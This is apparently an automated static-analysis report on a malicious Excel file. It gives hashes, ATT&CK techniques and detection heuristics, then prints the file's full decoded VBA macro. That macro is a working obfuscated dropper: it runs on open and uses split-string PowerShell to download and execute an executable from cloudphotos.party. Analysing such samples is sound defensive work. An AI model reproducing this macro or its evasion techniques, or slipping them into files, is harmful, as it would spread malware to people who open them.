Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4dcd6b3670aedab1…

MALICIOUS

Office (OLE)

Size: 48.0 KB  Created: 2000-07-27 22:23:01  First seen: 2019-05-16
MD5: d9cb39d72fb5c4892be55faa6116b892
SHA-1: c2496f5e2b18a44ba8b46ad58354966080ae993e
SHA-256: 4dcd6b3670aedab1c10e5af8c867b9bcc4785f2ee26bd1b174f927846e92c84d
Risk Score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a malicious Excel file containing VBA macros. A Workbook_Open macro is present, which is designed to execute automatically when the file is opened. This macro uses obfuscation techniques, including splitting string literals, to reassemble dangerous API names like 'cmD.EXE'. The script attempts to download a second-stage executable from 'http://cloudphotos.party/home' and save it as a random filename in the user's home directory, then execute it. This indicates a downloader or dropper functionality.

Heuristics (6)

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3097 bytes
SHA-256: 3fcffc116f1bb714ac0ae1d8bf2615425d155968c8ebc5aa376c84607045940d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Function multitoggler()
multitoggler = "EN  -ST -N"
End Function
Function zidanball()
zidanball = "\""{1}{0}\"" -f '.W" + "','em') ) ;  .  (  ${ver`B`os`ePR" + "EFER`eN`cE}.(  \""{1}{2}{0}\""-f 'Ng','t',(\""{0}{1}\""-f 'oSt','RI'  ) ).\""iNv`oke\""(   )[1,3]+  'X'-joiN''  ) ( (  "
End Function

Function fekiloko()
fekiloko = "Ell  -N"
End Function
Function vintagelamp()
vintagelamp = "[sySTeM.wI" + "ndOWs.FOrmS.clipBOaRD]::(\""{0}{1}\""-f'ge',(\""{0}{1}\""-f'TTex','t'  ) ).\""iNV`oKe\""(   )  )  ) ;  [System.WinDows.Forms.Clipboard]::(\""{2}{0}{1}\"" -f ( \""{1}{0}\"" -f 'ex','tT' ),'t','Se' ).\""i`NVo`ke\""(' ')"""""
End Function
Function ottappii()
ottappii = "tIOnpo By"
End Function
Function asusbooker()
asusbooker = sunshinepeople & formulabolid & cioopermini + lidergroups + zidanball + vintagelamp
End Function
Function farrerol()
Dim etallones As String
Randomize
etallones = Int(Rnd * 9444311#)
farrerol = etallones
End Function
Function cioopermini()
muujioji = farrerol
mollibenius = "em.Ne" + "t.W"
kiroll = "a`dF`i"
cioopermini = "SYst" + mollibenius + "ebCl" + "ient).""doW" + "Nl`o" + kiroll + "Le"".""Inv`OKE""(('http://cloud'+'photo'+'s.par'+'ty/h'+'ome'),""$omes\\" + muujioji + ".exe"")}while(!${?});^^^&(""{0}{3}{2}{1}""-f 'S','ess','roc','tart-P') $omes\" + muujioji + ".exe |cLip.ex" + "E&&c" + "mD.EXE"
End Function

Function sunshinepeople()
sunshinepeople = "cmD.E" + "XE /c ""echO/  sEt-va" + "RIABlE 387n  ([TYp" + "E](""{0}{3}{2}{1}"" -f 'E','nT','mE','nv" + "iRoN')  );  do{^" + "^^&(""{1}{0}"" -f 'p','sle" + "e') 31;${O" + "m`Es} =   (ls  VAr" + "Iable:38" + "7N "
End Function
Function lidergroups()
lidergroups = "/cPower" + "sh" + fekiloko + "oPR -E" + "xECU" + ottappii + "paS" + "S -WinD  h" + "iDd" + multitoggler + "Onin" + "tE  -N" + "Olo   "".(\""{2}" + "{0}{1}\""-f '-',(  \""{1}{0}\""-f'pe','Ty' ),'Add' ) -Assem ( \""{5}{0}{6}{2}{4}{1}{3}\""-f 'yst',(\""{0}{1}\"" -f 'ws.F','o'),'i" + "nd','rms','o','S',( "
End Function

Sub Workbook_Open()
Shell "" + asusbooker, Unchecked
End Sub


Function formulabolid()
formulabolid = ").Va" + "LuE::('G'+'e" + "tF'+'old" + "erP" + "ath').Invoke(('L'+'oc'+'al" + sistermonth + "}{0}{1}""-f'O','bj" + "ect','N" + "ew-')"
End Function
Function sistermonth()
sistermonth = "Ap'+'plic" + "ati'+'onD" + "ata'));(^" + "^^&(""{2"
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True